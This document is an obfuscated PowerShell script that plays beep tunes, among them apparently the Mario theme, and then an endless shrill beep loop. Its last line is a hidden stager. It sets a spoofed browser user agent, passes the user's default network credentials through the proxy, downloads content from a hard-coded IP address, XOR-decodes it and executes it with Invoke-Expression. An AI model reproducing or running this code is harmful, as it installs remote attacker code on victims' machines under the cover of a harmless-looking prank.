$q7ry= [tYpe]("{0}{1}{2}" -F'cONs','oL','e');  SEt-itEm ("var"+"IA"+"ble:Kt"+"14") (  [type]("{2}{1}{4}{3}{0}" -f 'St','tEm.neT.wEb','syS','eQUe','R') );  SEt-itEM ("var"+"iA"+"BL"+"E:6"+"to87m") ( [TyPE]("{4}{2}{1}{3}{0}"-f 'CHe','TIa','.crEdEn','LcA','SysTEM.neT')  );



.{
${O`Ne} = @((1320,500),(990,250),(1056,250),(1188,250),(1320,125),(1188,125),(1056,250),(990,250),(880,500),(880,250),(1056,250),(1320,500),(1188,250),(1056,250),(990,750),(1056,250),(1188,500),(1320,500),(1056,500),(880,500),(880,500))
${t`wo} = @((1188,500),(1408,250),(1760,500),(1584,250),(1408,250),(1320,750),(1056,250),(1320,500),(1188,250),(1056,250),(990,500),(990,250),(1056,250),(1188,500),(1320,500),(1056,500),(880,500),(880,500))
${t`H`ReE} = @((660,1000),(528,1000),(594,1000),(495,1000),(528,1000),(440,1000),(419,1000),(495,1000),(660,1000),(528,1000),(594,1000),(495,1000),(528,500),(660,500),(880,1000),(838,2000),(660,1000),(528,1000),(594,1000),(495,1000),(528,1000),(440,1000),(419,1000),(495,1000),(660,1000),(528,1000),(594,1000),(495,1000),(528,500),(660,500),(880,1000),(838,2000))
 $Q7RY::("{0}{1}" -f 'B','eep').Invoke(658,125)
foreach (${N} in ${O`NE}) {   (  iTEM  ('v'+'aRiA'+'BLe:q7'+'rY')  ).Value::"bE`eP"(${n}[0],${N}[1]) }
&("{0}{1}"-f'Slee','p') -M 250
foreach (${n} in ${t`wO}) {   (VaRiAbLE ("q"+"7Ry") -va  )::"BE`EP"(${n}[0],${n}[1]) }
&("{0}{1}" -f 'S','leep') -M 500
foreach (${N} in ${o`NE}) {  $q7rY::"be`ep"(${N}[0],${N}[1]) }
&("{0}{1}"-f 'Sle','ep') -M 250
foreach (${N} in ${T`wo}) {  (  Gci  ("VarIAblE"+":Q7r"+"Y") ).vaLUe::"B`eep"(${n}[0],${N}[1]) }
&("{0}{1}"-f 'S','leep') -M 500
foreach (${n} in ${t`hR`Ee}) {   $Q7RY::"b`EEp"(${n}[0],${n}[1]) }
}



.{
${M`ArIO} = @((130,100),(262,100),(330,100),(392,100),(523,100),(660,100),(784,300),(660,300),(146,100),(262,100),(311,100),(415,100),(523,100),(622,100),(831,300),(622,300),(155,100),(294,100),(349,100),(466,100),(588,100),(699,100),(933,300),(933,100),(933,100),(933,100),(1047,400))
foreach (${n} in ${Ma`R`iO}) {   $q7Ry::"B`Eep"(${N}[0],${N}[1]) }
}

.{
    
    while (1) {
        1..2 | .('%') {   (itEm ('variAbLE'+':'+'q7'+'rY')).vAlUE::("{1}{0}" -f 'ep','be').Invoke(3900, 225) }
        .("{1}{0}{2}" -f 'tart','S','-Sleep') -Milliseconds 450
    }
}

${W`C}=.("{1}{2}{0}" -f 'Ct','NEw-OBj','e') ("{3}{0}{2}{4}{5}{1}" -f '.N','lIEnT','eT.W','SystEM','E','BC');${u}=(("{2}{6}{12}{7}{11}{4}{10}{5}{13}{8}{9}{0}{1}{3}" -f ' l','i','Mozil','ke Gecko',' NT 6.1; ','dent/','la/5.','i','; ','rv:11.0)','WOW64; Tri','ndows','0 (W','7.0'));${Wc}."h`EaD`erS".("{0}{1}"-f 'A','dD').Invoke(("{1}{0}{2}" -f 'g','User-A','ent'),${u});${W`c}."P`ROXY" =  ( vARIaBLe ("K"+"t14") ).VaLue::"Def`AUl`TweB`PROxy";${Wc}."Pr`OXy"."C`REd`eNTIAlS" =  $6TO87M::"DeF`A`Ultn`Et`wORKcRE`deN`TiaLs";${k}=("{0}{3}{1}{2}{4}{5}{6}" -f'6193b','9e1376a0b8','0aac','d24','69','69be6d','ee');${I}=0;[CHaR[]]${b}=([CHaR[]](${w`C}.("{2}{0}{1}{3}"-f 'aD','STRi','DOwNlo','Ng').Invoke(("{2}{0}{8}{9}{3}{1}{7}{6}{4}{5}"-f 'tt','53:','h','//11.79.40.','in','dex.asp','/','80','p',':'))))|.('%'){${_}-bXor${k}[${I}++%${K}."lE`NGtH"]};.("{1}{0}"-f'EX','I') (${B}-Join'')
